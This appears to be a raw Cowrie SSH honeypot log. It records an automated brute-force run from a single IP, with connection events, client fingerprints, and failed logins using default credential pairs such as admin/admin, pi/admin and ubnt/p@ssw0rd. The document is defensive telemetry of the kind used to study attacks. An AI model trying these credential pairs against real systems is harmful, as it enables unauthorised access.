{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.671446Z","src_ip":"212.227.125.160","session":"5794172c8413"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.673594Z","src_ip":"212.227.125.160","session":"5794172c8413"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"12345678","message":"login attempt [ubnt/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.821531Z","src_ip":"212.227.125.160","session":"d925f97098d8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.844862Z","src_ip":"212.227.125.160","session":"f82ba5159a74"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.845676Z","src_ip":"212.227.125.160","session":"f82ba5159a74"}
{"eventid":"cowrie.login.failed","username":"noc","password":"12345678","message":"login attempt [noc/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.963473Z","src_ip":"212.227.125.160","session":"3c2a540f0236"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345678","message":"login attempt [pi/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.339164Z","src_ip":"212.227.125.160","session":"93d3258927fa"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin","message":"login attempt [student/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.446410Z","src_ip":"212.227.125.160","session":"5794172c8413"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.520297Z","src_ip":"212.227.125.160","session":"f82ba5159a74"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.584210Z","src_ip":"212.227.125.160","session":"89034e91ae1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52804,"dst_ip":"1.2.3.4","dst_port":22,"session":"c906b64d3cc6","protocol":"ssh","message":"New connection: 212.227.125.160:52804 (1.2.3.4:22) [session: c906b64d3cc6]","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.635875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.644965Z","src_ip":"212.227.125.160","session":"c906b64d3cc6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.679131Z","src_ip":"212.227.125.160","session":"c906b64d3cc6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.849724Z","src_ip":"212.227.125.160","session":"c906b64d3cc6"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.865453Z","src_ip":"212.227.125.160","session":"d925f97098d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52816,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b407d0222a7","protocol":"ssh","message":"New connection: 212.227.125.160:52816 (1.2.3.4:22) [session: 1b407d0222a7]","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.907905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.909031Z","src_ip":"212.227.125.160","session":"1b407d0222a7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:53.951530Z","src_ip":"212.227.125.160","session":"1b407d0222a7"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.006983Z","src_ip":"212.227.125.160","session":"3c2a540f0236"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52832,"dst_ip":"1.2.3.4","dst_port":22,"session":"43b377337bf6","protocol":"ssh","message":"New connection: 212.227.125.160:52832 (1.2.3.4:22) [session: 43b377337bf6]","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.049003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.050337Z","src_ip":"212.227.125.160","session":"43b377337bf6"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin","message":"login attempt [ubnt/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.081557Z","src_ip":"212.227.125.160","session":"1b407d0222a7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.092913Z","src_ip":"212.227.125.160","session":"43b377337bf6"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin","message":"login attempt [noc/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.222968Z","src_ip":"212.227.125.160","session":"43b377337bf6"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.383750Z","src_ip":"212.227.125.160","session":"93d3258927fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52838,"dst_ip":"1.2.3.4","dst_port":22,"session":"f05addc0c810","protocol":"ssh","message":"New connection: 212.227.125.160:52838 (1.2.3.4:22) [session: f05addc0c810]","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.424937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.425692Z","src_ip":"212.227.125.160","session":"f05addc0c810"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.471488Z","src_ip":"212.227.125.160","session":"f05addc0c810"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.490046Z","src_ip":"212.227.125.160","session":"5794172c8413"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52852,"dst_ip":"1.2.3.4","dst_port":22,"session":"49cbef1e9e8f","protocol":"ssh","message":"New connection: 212.227.125.160:52852 (1.2.3.4:22) [session: 49cbef1e9e8f]","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.531438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.531995Z","src_ip":"212.227.125.160","session":"49cbef1e9e8f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.564009Z","src_ip":"212.227.125.160","session":"f82ba5159a74"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.574219Z","src_ip":"212.227.125.160","session":"49cbef1e9e8f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin","message":"login attempt [pi/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.598204Z","src_ip":"212.227.125.160","session":"f05addc0c810"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52864,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c748091dc05","protocol":"ssh","message":"New connection: 212.227.125.160:52864 (1.2.3.4:22) [session: 7c748091dc05]","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.607065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.608437Z","src_ip":"212.227.125.160","session":"7c748091dc05"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.651674Z","src_ip":"212.227.125.160","session":"7c748091dc05"}
{"eventid":"cowrie.login.failed","username":"student","password":"p@ssw0rd","message":"login attempt [student/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.705065Z","src_ip":"212.227.125.160","session":"49cbef1e9e8f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"p@ssw0rd","message":"login attempt [ftpuser/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.835833Z","src_ip":"212.227.125.160","session":"7c748091dc05"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.893651Z","src_ip":"212.227.125.160","session":"c906b64d3cc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52876,"dst_ip":"1.2.3.4","dst_port":22,"session":"85ad9befb0bc","protocol":"ssh","message":"New connection: 212.227.125.160:52876 (1.2.3.4:22) [session: 85ad9befb0bc]","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.935439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.936135Z","src_ip":"212.227.125.160","session":"85ad9befb0bc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:54.979695Z","src_ip":"212.227.125.160","session":"85ad9befb0bc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"p@ssw0rd","message":"login attempt [admin/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.113875Z","src_ip":"212.227.125.160","session":"85ad9befb0bc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.125841Z","src_ip":"212.227.125.160","session":"1b407d0222a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52886,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca53739348e9","protocol":"ssh","message":"New connection: 212.227.125.160:52886 (1.2.3.4:22) [session: ca53739348e9]","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.169711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.170562Z","src_ip":"212.227.125.160","session":"ca53739348e9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.215400Z","src_ip":"212.227.125.160","session":"ca53739348e9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.266418Z","src_ip":"212.227.125.160","session":"43b377337bf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52898,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dded56bb8b0","protocol":"ssh","message":"New connection: 212.227.125.160:52898 (1.2.3.4:22) [session: 0dded56bb8b0]","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.312385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.313239Z","src_ip":"212.227.125.160","session":"0dded56bb8b0"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"p@ssw0rd","message":"login attempt [ubnt/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.347516Z","src_ip":"212.227.125.160","session":"ca53739348e9"}
